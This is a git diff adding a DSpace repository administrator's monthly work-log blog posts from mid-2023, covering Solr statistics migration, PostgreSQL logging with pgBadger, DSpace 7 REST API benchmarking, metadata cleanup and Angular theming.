- In _most_ cases removing it is the correct thing to do, for example "Pesticides : une arme à double tranchant" → "Pesticides: une arme à double tranchant"
- But in some items it is tricky, for example "L'environnement juridique est-il propice à la gestion" → "L'environnement juridique est-il propice àla gestion"
- I guess it would really need some good heuristics or a human to verify...
- I upgraded OpenRXV to Angular v14
## 2023-07-28
- After a bit more testing I merged the [Angular v14 changes to OpenRXV master](https://github.com/ilri/OpenRXV/pull/184)
- I am getting an error trying to import the 2020 Solr statistics from CGSpace to DSpace 7:
```console
Exception in thread "main" org.apache.solr.client.solrj.impl.BaseHttpSolrClient$RemoteSolrException: Error from server at http://localhost:8983/solr/statistics: ERROR: [doc=0008a7c1-e552-4a4e-93e4-4d23bf39964b] Error adding field 'workflowItemId'='0812be47-1bfe-45e2-9208-5bf10ee46f81' msg=For input string: "0812be47-1bfe-45e2-9208-5bf10ee46f81"
at org.apache.solr.client.solrj.impl.HttpSolrClient.executeMethod(HttpSolrClient.java:745)
at org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:259)
at org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:240)
at org.apache.solr.client.solrj.SolrRequest.process(SolrRequest.java:234)
at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:102)
at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:69)
at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:82)
at it.damore.solr.importexport.App.insertBatch(App.java:295)
at it.damore.solr.importexport.App.lambda$writeAllDocuments$10(App.java:276)
at it.damore.solr.importexport.BatchCollector.lambda$accumulator$0(BatchCollector.java:71)
at java.base/java.util.stream.ReduceOps$3ReducingSink.accept(ReduceOps.java:169)
at java.base/java.util.Iterator.forEachRemaining(Iterator.java:133)
at java.base/java.util.Spliterators$IteratorSpliterator.forEachRemaining(Spliterators.java:1845)
at java.base/java.util.stream.AbstractPipeline.copyInto(AbstractPipeline.java:509)
at java.base/java.util.stream.AbstractPipeline.wrapAndCopyInto(AbstractPipeline.java:499)
at java.base/java.util.stream.ReduceOps$ReduceOp.evaluateSequential(ReduceOps.java:921)
at java.base/java.util.stream.AbstractPipeline.evaluate(AbstractPipeline.java:234)
at java.base/java.util.stream.ReferencePipeline.collect(ReferencePipeline.java:682)
at it.damore.solr.importexport.App.writeAllDocuments(App.java:252)
at it.damore.solr.importexport.App.main(App.java:150)
```
- Ahhhh, in DSpace 6 this field was a string in the Solr statistics schema, but in DSpace 7 it is an integer...?
- Oh, it seems to be an Atmire change in our DSpace 6... hmmm, so we need to ignore the `workflowItemId` field when exporting
- Upstream: https://github.com/DSpace/DSpace/blob/dspace-6_x/dspace/solr/statistics/conf/schema.xml#L328
- ILRI: https://github.com/ilri/DSpace/blob/6_x-prod/dspace/solr/statistics/conf/schema.xml#L344
- I am wondering if we can skip all these workflow fields since I don't think we are using any aspects of statistics related to workflows
- I diffed our Solr statistics schema with the one from vanilla DSpace 6 and got a list of all the fields that were different:
```
isInternal,workflowItemId,containerCommunity,containerCollection,containerItem,containerBitstream,dateYear,dateYearMonth,filterquery,complete_query,simple_query,complete_query_search,simple_query_search,ngram_query_search,ngram_simplequery_search,text,storage_statistics_type,storage_size,storage_nb_of_bitstreams,name,first_name,last_name,p_communities_id,p_communities_name,p_communities_map,p_group_id,p_group_name,p_group_map,group_id,group_name,group_map,parent_count,bitstreamId,bitstreamCount,actingGroupId,actorMemberGroupId,actingGroupParentId,rangeDescription,range,version_id,file_id,cua_version,core_update_run_nb,orphaned
```
- I will combine it with the other fields I was skipping above and try the export again:
```console
$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2020.json -f 'time:[2020-01-01T00\:00\:00Z TO 2020-12-31T23\:59\:59Z]' -k uid -S actingGroupId,actingGroupParentId,actorMemberGroupId,author_mtdt,author_mtdt_search,bitstreamCount,bitstreamId,complete_query,complete_query_search,containerBitstream,containerCollection,containerCommunity,containerItem,core_update_run_nb,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,file_id,filterquery,first_name,geoipcountrycode,geoIpCountryCode,group_id,group_map,group_name,ip_ngram,ip_search,isArchived,isInternal,iso_mtdt,iso_mtdt_search,isWithdrawn,last_name,name,ngram_query_search,ngram_simplequery_search,orphaned,parent_count,p_communities_id,p_communities_map,p_communities_name,p_group_id,p_group_map,p_group_name,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,referrer_ngram,referrer_search,simple_query,simple_query_search,solr_update_time_stamp,storage_nb_of_bitstreams,storage_size,storage_statistics_type,subject_mtdt,subject_mtdt_search,text,userAgent_ngram,userAgent_search,version_id,workflowItemId
```
- Export a list of affiliations from the Initiatives community for Peter:
```console
$ dspace metadata-export -i 10568/115087 -f /tmp/2023-07-28-initiatives.csv
$ csvcut -c 'cg.contributor.affiliation[en_US]' ~/Downloads/2023-07-28-initiatives.csv \
| sed -e 1d -e 's/^"//' -e 's/"$//' -e 's/||/\n/g' -e '/^$/d' \
| sort | uniq -c | sort -hr \
| awk 'BEGIN { FS = "^[[:space:]]+[[:digit:]]+[[:space:]]+" } {print $2}'\
| sed -e '1i cg.contributor.affiliation' -e 's/^\(.*\)$/"\1"/' \
> /tmp/2023-07-28-initiatives-affiliations.csv
```
- This is a method I first used in 2023-01 to export affiliations ONLY used in items in the Initiatives community
- I did the same for authors and investors
## 2023-07-29
- Export CGSpace to look for missing Initiative collection mappings
- I found a bunch of locks waiting for many hours and killed them:
```console
$ psql < locks-age.sql | awk -F"|" '$9 ~ / [[:digit:]][1-9]:[[:digit:]]{2}:[[:digit:]]{2}\./ {print $10}' | sort -u | xargs kill
```
- This looks for a pattern matching something like `11:30:48.598436` in the age column (not 00:00:00) and kills them
- Start a harvest on AReS
<!-- vim: set sw=2 ts=2: -->

266
content/posts/2023-08.md Normal file
View File

@ -0,0 +1,266 @@
---
title: "August, 2023"
date: 2023-08-03T11:18:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2023-08-03
- I finally got around to working on Peter's cleanups for affiliations, authors, and donors from last week
- I did some minor cleanups myself and applied them to CGSpace
- Start working on some batch uploads for IFPRI
<!--more-->
## 2023-08-04
- Minor cleanups on IFPRI's batch uploads
- I also did a duplicate check and found thirteen items that seem to be duplicates, so I sent them to Leigh to check
- I read this [interesting blog post about PostgreSQL's `log_statement` function](https://www.endpointdev.com/blog/2012/06/logstatement-postgres-all-full-logging/)
- Someone pointed out that this also lets you take advantage of [PgBadger](https://github.com/darold/pgbadger) analysis
- I enabled statement logging on DSpace Test and I will check it in a few days
- Reading about DSpace 7 REST API again
- Here is how to get the first page of 100 items: https://dspace7test.ilri.org/server/api/discover/search/objects?dsoType=item&page=1&size=100
- I really want to benchmark this to see how fast we can get all the pages
- Another thing I notice is that the bitstreams are not here, so that will be an extra call...
## 2023-08-05
- Export CGSpace to check for missing Initiative collection mappings
- Start a harvest on AReS
## 2023-08-07
- I'm checking the PostgreSQL logs now that statement logging has been enabled for a few days on DSpace Test
- I see the logs are about 7 or 8 GB, which is larger than expected—and this is the test server!
- I will now play with pgbadger to see if it gives any useful insights
- Hmm, it sems the `log_statement` advice was old as pgbadger itself says:
> Do not enable log_statement as its log format will not be parsed by pgBadger.
... and:
> Warning: Do not enable both log_min_duration_statement, log_duration and log_statement all together, this will result in wrong counter values. Note that this will also increase drastically the size of your log. log_min_duration_statement should always be preferred.
- So we need to follow pgbadger's instructions rather to get a suitable log file
- After enabling the new settings I see that our log file is going to be reaallllly big... hmmmm will check tomorrow morning
- More work on the IFPRI batch uploads
## 2023-08-08
- Apply more corrections to authors from Peter on CGSpace
- I finally figured out a `log_line_prefix` for PostgreSQL that works for pgBadger:
```console
log_line_prefix = '%t [%p]: user=%u,db=%d,app=%a,client=%h '
```
- Now I can generate reports:
```console
# /usr/bin/pgbadger -I -q /var/log/postgresql/postgresql-14-main.log -O /srv/www/pgbadger
```
- Ideally we would run this incremental report every day on the postgresql-14-main.log.1 aka yesterday's version of the log file after it is rotated
- Now I have to see how large the file will be...
- I did some final updates to the ninety IFPRI records and uploaded them to DSpace Test first, then to CGSpace
## 2023-08-11
- Fix bug with header background on DSpace 7 on mobile
## 2023-08-12
- Export CGSpace to check for missing Initiative collection mappings
- I deployed the latest OpenRXV master branch with Angular v14 and backend updates on the server
- Start a harvest on AReS
## 2023-08-14
- I ported the DSpace 6.x REST API patch to allow specifying a bundle name when POSTing a bitstream to the legacy REST API in DSpace 7.6
## 2023-08-16
- I noticed that the DSpace statistics pages don't seem to work on communities or collections
- I finally took time to look in the DSpace log file and found this for one:
```console
2023-08-16 14:30:31,873 WARN dace8f96-f034-488e-b38c-9f2eb5d0e002 6cbd0b18-6852-4294-99a5-02dfcab0a469 org.dspace.app.rest.exception.DSpaceApiExceptionControllerAdvice @ Request is invalid or incorrect (status:400 exception: Invalid UUID string: -1 at: java.base/java.util.UUID.fromString1(UUID.java:280))
```
- I'm surprised to see this because those should have been dealt with when we upgraded to DSpace 6
- Looking in the Solr statistics core I see ~1,000,000 documents with the ID `-1`, and about 57,000,000 that don't
- Also interesting, faceting by `dateYear` I see:
- 2023: 209566
- 2022: 403871
- 2021: 336548
- 2020: 31659
- ... none before 2020
- They are all type 5, which is "Site" aka the home page, according to `dspace-api/src/main/java/org/dspace/core/Constants.java`
- Ah hah, and I can see in my DSpace 7 test Solr there are a bunch of hits with `type: 5` that have "-1" of course, but also newer ones that have an actual UUID
- I used the `/server/api/dso/find?uuid=3945ec23-2426-4fce-a2ea-48b38b91547f` endpoint to find out that there is a new `/server/api/core/sites` endpoint listing exactly one site (the home page) with this ID
- So for now I can replace all the "-1" documents with this ID on the test server at least, then I will have to remember to do that during the migration of the production instance
- I did a new export from DSpace 6 using solr-import-export-json with a query limiting it to documents of type 5 and negative 1 ID:
```console
$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-fix-uuid.json -f 'id:\-1 AND type:5 AND time:[2020-01-01T00\:00\:00Z TO 2023-12-31T23\:59\:59Z]' -k uid -S actingGroupId,actingGroupParentId,actorMemberGroupId,author_mtdt,author_mtdt_search,bitstreamCount,bitstreamId,complete_query,complete_query_search,containerBitstream,containerCollection,containerCommunity,containerItem,core_update_run_nb,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,file_id,filterquery,first_name,geoipcountrycode,geoIpCountryCode,group_id,group_map,group_name,ip_ngram,ip_search,isArchived,isInternal,iso_mtdt,iso_mtdt_search,isWithdrawn,last_name,name,ngram_query_search,ngram_simplequery_search,orphaned,parent_count,p_communities_id,p_communities_map,p_communities_name,p_group_id,p_group_map,p_group_name,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,referrer_ngram,referrer_search,simple_query,simple_query_search,solr_update_time_stamp,storage_nb_of_bitstreams,storage_size,storage_statistics_type,subject_mtdt,subject_mtdt_search,text,userAgent_ngram,userAgent_search,version_id,workflowItemId
```
- Then I replaced the IDs with the UUID of the site homepage on DSpace 7 Test:
```console
$ sed -i 's/"id":"-1"/"id":"3945ec23-2426-4fce-a2ea-48b38b91547f"/' /tmp/statistics-fix-uuid.json
```
- I re-imported those records and I no longer see the "-1" IDs, but still get the same error in the log
- I don't understand, maybe there is some voodoo, so I rebooted the server
- Hmm, no, it's not a voodoo cache issue, so I really need to debug this:
```console
2023-08-16 15:44:07,122 WARN dace8f96-f034-488e-b38c-9f2eb5d0e002 036b88e6-7548-4852-9646-f345ce3bfcc2 org.dspace.app.rest.exception.DSpaceApiExceptionControllerAdvice @ Request is invalid or incorrect (status:400 exception: Invalid UUID string: -1 at: java.base/java.util.UUID.fromString1(UUID.java:280))
```
- On a related note, I figured out that the root site already has a UUID in DSpace 6, and it's exactly the one above (3945ec23-2426-4fce-a2ea-48b38b91547f)
- I noticed it while looking at the [DSpace 6 REST API's hierarchy page](https://cgspace.cgiar.org/rest/hierarchy)
- So I can update these "-1" IDs with "type:5" in our production I think...
## 2023-08-17
- I decided to update the "-1" IDs in Solr on DSpace 6
- Unfortunately, in Solr there is no way to update only documents matching a query, so we have to export and re-import
- I exported all documents with "type:5" (Homepage) and replaced the ID in the JSON:
```console
$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-fix-uuid.json -f 'type:5' -k uid -S actingGroupId,actingGroupParentId,actorMemberGroupId,author_mtdt,author_mtdt_search,bitstreamCount,bitstreamId,complete_query,complete_query_search,containerBitstream,containerCollection,containerCommunity,containerItem,core_update_run_nb,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,file_id,filterquery,first_name,geoipcountrycode,geoIpCountryCode,group_id,group_map,group_name,ip_ngram,ip_search,isArchived,isInternal,iso_mtdt,iso_mtdt_search,isWithdrawn,last_name,name,ngram_query_search,ngram_simplequery_search,orphaned,parent_count,p_communities_id,p_communities_map,p_communities_name,p_group_id,p_group_map,p_group_name,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,referrer_ngram,referrer_search,simple_query,simple_query_search,solr_update_time_stamp,storage_nb_of_bitstreams,storage_size,storage_statistics_type,subject_mtdt,subject_mtdt_search,text,userAgent_ngram,userAgent_search,version_id,workflowItemId
$ sed -i 's/"id":"-1"/"id":"3945ec23-2426-4fce-a2ea-48b38b91547f"/' /tmp/statistics-fix-uuid.json
```
- (Oops, skipping the fields above was not necessary, since I'm importing back into DSpace 6 where those fields exist)
- Then I re-imported:
```
$ ./run.sh -s http://localhost:8081/solr/statistics -a import -o /tmp/statistics-fix-uuid.json -k uid
```
- This worked, but I still see new records coming in that have "id:-1" so I will need to repeat this during the migration.
- I also notice many stats records that have erroneous cities:
- `"city":"com.maxmind.geoip2.record.City [ {} ]"`
- `"city":"com.maxmind.geoip2.record.City [ {\"geoname_id\":1002145,\"names\":{\"de\":\"George\",\"en\":\"George\",\"ru\":\"Джордж\",\"fr\":\"George\",\"ja\":\"ジョージ\"}} ]"`
## 2023-08-18
- Export CGSpace to check for missing Initiative collection mappings
## 2023-08-19
- Start a harvest on AReS
## 2023-08-21
- Experiment with the DSpace 7 REST API
- I wrote a Python script to benchmark harvesting all 100,000+ items using the `/api/discover/search/objects` endpoint 100 items at a time
- I was able to harvest the entire 106,000 items in fifty-two minutes, which seems slow, but that's about ten times faster than with the legacy REST API...
- Still, I need to benchmark a bit more, as the item response doesn't include collection mappings or thumbnails
- Reading the [API docs](https://github.com/DSpace/RestContract/blob/main/README.md#etags--conditional-headers) it seems that we should be able to use the standard `If-Modified-Since` header for some endpoints
- I tried it on the `/api/discover/search/objects` and `/api/core/items` endpoints, but apparently those don't support this header because I don't see a `Last-Modified` header in the response
- According to the docs, it means that these endpoints indeed don't support it...
## 2023-08-22
- I was experimenting with the DSpace 7 REST API again
- This time looking at the thumbnail responses in item endpoints
- According to [the documentation](https://github.com/DSpace/RestContract/blob/main/items.md#main-thumbnail) the API will respond with HTTP 200 if there is a thumbnail, and HTTP 204 if there is no content
- That means we need to make the request before we can even find out!
- Tim on DSpace Slack pointed out the DSpace 7 REST API's [projections](https://github.com/DSpace/RestContract/blob/main/projections.md)
- This means we can embed resources like thumbnail and owningCollection in the item (and other) requests, for example: https://dspace7test.ilri.org/server/api/discover/search/objects?dsoType=item&embed=thumbnail,owningCollection
## 2023-08-23
- I benchmarked the DSpace 7 REST API with the new embeds and it took four hours and seventeen minutes to get all 106,000 items on DSpace 7 Test
- So this is much slower than the results I saw earlier this week, but maybe slightly faster than DSpace 6?
- Maria from Alliance contacted me to say they have agreed to use UN M.49 regions more strictly in TIP, so they want to replace our non-standard "Latin America" region with "Latin America and the Caribbean", "Caribbean" and "Americas" on all Alliance outputs
- I exported their community on CGSpace and fixed the metadata in OpenRefine
- I tried to run `dspace cleanup -v` on CGSpace, but got this error:
```
Caused by: org.postgresql.util.PSQLException: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
Detail: Key (uuid)=(61bff7da-c8e3-420f-841c-ec5e8238d716) is still referenced from table "bundle".
```
- The solution, as always, is to delete those IDs manually in PostgreSQL:
```
$ psql -d dspace -c "UPDATE bundle SET primary_bitstream_id=NULL WHERE primary_bitstream_id IN ('61bff7da-c8e3-420f-841c-ec5e8238d716');"
UPDATE 1
```
- I also tried to delete all users who haven't logged in since 2017 using the groomer script, but it crashes due to those users still having items or workflows or whatever:
```console
$ dspace dsrun org.dspace.eperson.Groomer -a -b 08/23/2017 -d
```
- I see that it is now [possible in DSpace 7 to delete such users](https://github.com/DSpace/DSpace/pull/2229) so we will have to wait
## 2023-08-24
- I spent some time trying to get themes to extend in DSpace 7
- I finally got a basic ILRI theme working, but there is a bug that causes theme components to get duplicated
## 2023-08-25
- Meeting with Altmetric about the next phase of their integration with CGSpace
- A bit of cleanup on CGSpace metadata
- I fixed DOIs, licenses, dates, subjects, affiliations, titles, publishers, types, and titles in 1,240 items
## 2023-08-26
- A few weeks ago we received a request from the Fruits and Vegetables Initiative saying that they've gotten approval to begin using the long name instead of the short one everywhere, apparently for SEO reasons
- After communicating with PRMS and other teams working on systems using this metadata I finally updated them in CGSpace
- Export CGSpace to check for missing Initiative collection mappings
- Start a harvest on AReS
- I fixed ~200 titles with new lines, excessive whitespace, and Unicode FFFD characters
- There are many more with 00A0, 200B, etc, but those need more careful inspection
## 2023-08-28
- Day one of CGSpace partners meeting in Addis
- Oh this is a game changer, I just realized that we can use Solr query syntax in the DSpace 7 REST API, so we can do this for example:
```
https://dspace7test.ilri.org/server/api/discover/search/objects?query=lastModified%3A%5B2023-08-01T00%3A00%3A00Z%20TO%20%2A%5D
```
- Which is this query: `lastModified:[2023-08-01T00:00:00Z TO *]`
- The queries need to be URL encoded of course
- Oh nice, and we can do the same for accession date:
```
https://dspace7test.ilri.org/server/api/discover/search/objects?query=dc.date.accessioned_dt%3A%5B2023-08-01T00%3A00%3A00Z%20TO%20%2A%5D
```
- That is this query: `dc.date.accessioned_dt:[2023-08-01T00:00:00Z TO *]`
- We need to use the dt version of the accession date because that is the one that has a date type
- This query give 290 results, which should be the items submitted in August!
## 2023-08-29
- Day two of CGSpace partners meeting in Addis
## 2023-08-30
- Day three of CGSpace partners meeting in Addis
- I did a lot of work on the CGSpace Angular theme for DSpace 7
- Many changes to Discovery filters and search results
## 2023-08-31
- Day four of CGSpace partners meeting in Addis
- I removed the old Bioversity and CIAT subjects from Discovery facets on CGSpace
- Maria and Leroy said they are no longer using them so we don't need to keep indexing and displaying them
- I did a lot of work on the CGSpace Angular theme for DSpace 7
- Now we have clickable keywords that go to Discovery instead of browse, as well as some new icons
- We don't need to use the clunky browse links to get clickable links any more so I will disable those
<!-- vim: set sw=2 ts=2: -->

243
content/posts/2023-09.md Normal file
View File

@ -0,0 +1,243 @@
---
title: "September, 2023"
date: 2023-09-02T17:29:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2023-09-02
- Export CGSpace to check for missing Initiative collection mappings
- Start a harvest on AReS
<!--more-->
## 2023-09-03
- I figured out how to use Altmetric and Dimensions badges in the DSpace Angular frontend
- It still feels hacky, but using [AfterViewInit](https://stackoverflow.com/questions/41936631/how-to-trigger-the-function-after-dom-markup-is-loaded-in-angular-style-applicat), and importing the Altmetric `embed.js` in the component works
- The style on mobile also needs work...
## 2023-09-06
- Discussion with Marie about finalizing the output types list on GitHub
- I did some review and cleanup in preparation for publishing the new list
## 2023-09-07
- Export CGSpace to start doing a review of the metadata
- First I will start by extracting all items with DOIs, along with some fields I can compare against Crossref:
```console
$ csvgrep -c 'cg.identifier.doi[en_US]' -r 'doi.org' ~/Downloads/2023-09-07-cgspace.csv \
| csvcut -c 'id,dc.title[en_US],dcterms.issued[en_US],dcterms.available[en_US],cg.issn[en_US],cg.isbn[en_US],cg.volume[en_US],cg.issue[en_US],cg.number[en_US],dcterms.extent[en_US],cg.identifier.doi[en_US],cg.reviewStatus[en_US],cg.isijournal[en_US],dcterms.license[en_US],dcterms.accessRights[en_US],dcterms.type[en_US],dc.identifier.uri[en_US]' \
> /tmp/2023-09-07-cgspace-dois.csv
$ csvgrep -c 'cg.identifier.doi[en_US]' -r 'doi.org' ~/Downloads/2023-09-07-cgspace.csv | csvcut -c 'cg.identifier.doi[en_US]' | sed 1d > /tmp/2023-09-07-cgspace-dois.txt
```
- Then I resolved the DOIs from Crossref:
```console
$ ./ilri/crossref_doi_lookup.py -i /tmp/2023-09-07-cgspace-dois.txt -o /tmp/2023-09-07-cgspace-dois-results.csv -e a.orth@cgiar.org
```
- A user emailed to ask about uploading a 180MB PDF to CGSpace
- I used GhostScript to try reducing it using the `screen`, `ebook` and `prepress` presets:
```console
$ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/screen -dNOPAUSE -dQUIET -dBATCH -sOutputFile=primer-screen.pdf Primer\ \(digital\)_Climate-\ smart\ and\ regenerative\ agriculture\ in\ climate\ change\ adaptation.pdf
$ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -dQUIET -dBATCH -sOutputFile=primer-ebook.pdf Primer\ \(digital\)_Climate-\ smart\ and\ regenerative\ agriculture\ in\ climate\ change\ adaptation.pdf
$ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/prepress -dNOPAUSE -dQUIET -dBATCH -sOutputFile=primer-prepress.pdf Primer\ \(digital\)_Climate-\ smart\ and\ regenerative\ agriculture\ in\ climate\ change\ adaptation.pdf
```
- The `prepress` one is 300DPI and looks visually identical to the original, so I proposed that we use that one
## 2023-09-08
- I did a review of the metadata for our items with DOIs, comparing with data from Crossref
- I spot checked a handful of issue / online dates and licenses, and saw that Crossref's dates are always more accurate than ours when they differ
- I also filled in some missing volumes, issues, ISSNs, and extents
- This results in 14,000 changes to existing items, which will take several days to import unfortunately
- After eight hours the first file is only about 2/3 finished... sigh
- Meet with Peter to discuss changes to the DSpace 7 test
- Minor updates to submission forms and some new ideas for the home page and item page
- I figured out how to use a themed home page component and add a cards UI to our CGSpace theme
## 2023-09-09
- I can't believe that almost 18 hours later the first CSV import with 5,000 changes is not done...
- Run all system updates on CGSpace and reboot it, as it had been two months since the last time
## 2023-09-10
- Minor work on the DSpace 7 home page
## 2023-09-11
- Export CGSpace to check for missing Initiative collection mappings
- Start a harvest on AReS
## 2023-09-12
- Minor work on DSpace 7 home page
- Minor work on CG Core types
- I published a new HTML version of the updated IPtypes and archived the current version as v2.0.0 so we can still reference it
## 2023-09-13
- Stefano reminded me about the updated OAI MODS mappings on CGSpace so I re-applied them on DSpace Test and updated the OAI index so he could confirm
- Now I'm ready to put it on CGSpace if he confirms
- I created a basic theme for CIP on DSpace 7
- While doing that I noticed that a bunch of CIP bitstreams didn't have the latest 500px thumbnails so I re-ran filter-media on a handful of their collections
- I had two occurrences of an OOM kill of the Tomcat 9 java process on DSpace 7 test tonight
- Once while doing a Discovery index, the other while doing filter media
## 2023-09-15
- Discuss issues with the Altmetric API with the Altmetric support team
- Apparently we can use a different API, the [Explorer API](https://www.altmetric.com/explorer/documentation/api), since we already have access to the Explorer dashboard
- I reduced the Solr heap size on DSpace 7 from 3GB to 2GB
- Apparentlty I already did this from 4GB to 3GB a few months ago
- The Solr admin interface was showing Solr taking ~1GB of RAM so I think this should be safe
- Mark on DSpace Slack said he uses PM2's `--max-memory-restart` so the processes restart when they hit the limit
- Also, he said he had to reduce `cache:serverSide:botCache:max` from 1000 to 500 to cache less SSR pages in memory
- I decided to try deploying DSpace 7 Test on a Hetzner server with 64GB RAM, 6 CPUs, and 2x512GB NVMe SSD
## 2023-09-16
- Export CGSpace to check for missing Initiative collection mappings
- Start a harvest on AReS
- Configure the privacy policy page on DSpace 7 using a themed component with the text from our DSpace 6 site
- I realized that for all my custom Angular components I should be using `routerLink` instead of `href` when I am constructing links
- The `routerLink` routes within the single page application and saves state, while the `href` reloads the page
- Using the `routerLink` way is faster and results in less flashing and jumping in the page when navigating
- See: https://stackoverflow.com/a/61588147
## 2023-09-17
- I added an About page to DSpace 7 Test using similar logic to the privacy page
## 2023-09-18
- I filed a GitHub issue for being unable to navigate dropdown lists using the keyboard on the dspace-angular submission form: https://github.com/DSpace/dspace-angular/issues/2500
- I filed a GitHub issue for the search filters capitalizing metadata values: https://github.com/DSpace/dspace-angular/issues/2501
## 2023-09-19
- Complete migration of DSpace 7 Test from Linode to Hetzner
- Export some years of Solr stats from CGSpace to import on the new DSpace 7 Test:
```console
$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2020-2022.json -f 'time:[2020-01-01T00\:00\:00Z TO 2022-12-31T23\:59\:59Z]' -k uid -S actingGroupId,actingGroupParentId,actorMemberGroupId,author_mtdt,author_mtdt_search,bitstreamCount,bitstreamId,complete_query,complete_query_search,containerBitstream,containerCollection,containerCommunity,containerItem,core_update_run_nb,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,file_id,filterquery,first_name,geoipcountrycode,geoIpCountryCode,group_id,group_map,group_name,ip_ngram,ip_search,isArchived,isInternal,iso_mtdt,iso_mtdt_search,isWithdrawn,last_name,name,ngram_query_search,ngram_simplequery_search,orphaned,parent_count,p_communities_id,p_communities_map,p_communities_name,p_group_id,p_group_map,p_group_name,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,referrer_ngram,referrer_search,simple_query,simple_query_search,solr_update_time_stamp,storage_nb_of_bitstreams,storage_size,storage_statistics_type,subject_mtdt,subject_mtdt_search,text,userAgent_ngram,userAgent_search,version_id,workflowItemId
```
- Ben sent me an export of ILRI presentations from Slideshare and asked if we could see if any are missing on CGSpace
- First I exported CGSpace and extracted the `cg.identifier.url` column so I could normalize all Slideshare URLs to use "https://www.slideshare.net" instead of localized variants (es.slideshare.net, fr.slideshare.net, etc) as well as non-https links and links with query params and slashes at the end
- This was about 250 URLs
- I extracted the URL field from both our list and the Slideshare list and then used [GNU `join` to print non-matched lines](https://unix.stackexchange.com/questions/274548/join-two-files-each-with-two-columns-including-non-matching-lines):
```console
$ join -t, -v 2 -11 -21 -o auto /tmp/cgspace-ilri-slideshare-sorted-only-urls-sorted.csv /tmp/ilri-slideshare-sorted-sorted.csv | wc -l
542
```
- Important to note that you must use GNU `sort` on the fiels first, as I had tried sorting in vim and it didn't satisfy `join`
- So it seems there are 542 Slideshare presentations we are missing
## 2023-09-20
- Regarding the incorrect city in Solr statistics, I see we have 1,600,000 of them
- Before filing a GitHub issue, I want to check if they maybe come from an Atmire module, as I see them clustered around two particular CUA versions:
```json
{
"responseHeader": {
"status": 0,
"QTime": 2760,
"params": {
"q": "city:com.maxmind.geoip2.record.City*",
"facet.field": "cua_version",
"indent": "true",
"rows": "0",
"wt": "json",
"facet": "true",
"_": "1695192301927"
}
},
"response": {
"numFound": 1661863,
"start": 0,
"docs": []
},
"facet_counts": {
"facet_queries": {},
"facet_fields": {
"cua_version": [
"6.x-4.1.10-ilri-RC7",
1112186,
"6.x-4.1.10-ilri-RC5",
451180,
"6.x-4.1.10-ilri-RC9",
0
]
},
"facet_dates": {},
"facet_ranges": {},
"facet_intervals": {}
}
}
```
- I migrated AReS from Linode to Hetzner
- I asked on Slack and someone told me that we need to edit `src/app/menu.resolver.ts` to add new drop down menus to the top navbar
- It works, though is unfortunate that we can't do it in a theme
## 2023-09-21
- More minor work on DSpace 7 home page and menus
- Meeting to discuss types and DSpace 7 migration plans
- Create a DSpace 7 theme for IITA
## 2023-09-22
- Create a DSpace 7 theme for IWMI
- I had some issues with pm2 on the new DSpace 7 Test
- It seems to be due to mixing systemd starting versus manually starting / stopping...
- After reading the discussion in [this pm2 issue](https://github.com/Unitech/pm2/issues/2914) I realize that we probably need to use `--no-daemon` to have systemd fully manage the processes without pm2 trying to save state
## 2023-09-23
- Export CGSpace to check for missing Initiative collection mappings
- Start a harvest on AReS
## 2023-09-25
- CGSpace metadata and community / collection cleanup
- Review some patches on DSpace Angular
- Create a basic Alliance theme for DSpace 7
## 2023-09-27
- I realized that we can get controlled vocabularies from DSpace 7's REST API, for both value-pairs and hierarchical controlled vocabularies, ie:
https://dspace7test.ilri.org/server/api/submission/vocabularies/common_iso_languages/entries
## 2023-09-29
- Meeting with Aditi and others to discuss plan for using CGSpace to do a systematic review of CGIAR research on climate change
- I cleaned up metadata for a hundred or so items, and realized we will need to do more to make sure abstracts and open access status are correct since there will be a laser focus on the metadata
## 2023-09-30
- Export CGSpace to check for missing Initiative collection mappings
- Still working on checking Unpaywall for access rights and licenses for our DOIs
- Regarding Unpaywall's "evidence" metadata about whether an item is open access or not, after looking at dozens of items manually:
- evidence: "oa journal (via doaj)" <---- yes
- evidence: "open (via free article)" <---- hmmm, not always correct
- evidence: "open (via page says license)" <--- noooo, can't rely on that
- evidence: "open (via page says Open Access)" <---- yes...?
- evidence: "open (via free pdf)" <---- hmmm, not always correct
- evidence: "oa journal (via publisher name)" <---- noooo
- I updated access status for about four hundred more items based on this, and licenses for a dozen or so
<!-- vim: set sw=2 ts=2: -->

150
content/posts/2023-10.md Normal file
View File

@ -0,0 +1,150 @@
---
title: "October, 2023"
date: 2023-10-02T09:05:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2023-10-02
- Export CGSpace to check DOIs against Crossref
- I found that [Crossref's metadata is in the public domain under the CC0 license](https://www.crossref.org/documentation/retrieve-metadata/rest-api/rest-api-metadata-license-information/)
- One interesting thing is the abstracts, which are copyrighted by the copyright owner, meaning Crossref cannot waive the copyright under the terms of the CC0 license, because it is not theirs to waive
- We can be on the safe side by using only abstracts for items that are licensed under Creative Commons
<!--more-->
